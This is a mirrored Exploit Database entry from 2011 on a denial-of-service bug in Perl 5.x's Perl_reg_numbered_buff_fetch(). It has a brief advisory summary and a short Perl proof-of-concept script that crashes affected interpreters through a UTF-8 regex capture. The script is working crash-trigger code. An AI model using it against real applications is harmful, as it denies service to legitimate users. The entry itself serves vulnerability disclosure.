Perl 5.x – ‘Perl_reg_numbered_buff_fetch()’ Remote Denial of Service

• Exploit Database
• 13 阅读

• 作者： Vladimir Perepelitsa
  日期： 2011-03-23
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/35489/

• source: https://www.securityfocus.com/bid/47006/info
  
  Perl is prone to a remote denial-of-service vulnerability.
  
  An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users. 
  
  #!/usr/bin/perl
  
  
  my @x = ("A=B","AAAA=/");
  utf8::upgrade $_ for @x;
  $x[1] =~ s{/\s*$}{};
  for (@x) {
  m{^([^=]+?)\s*=.+$};
  }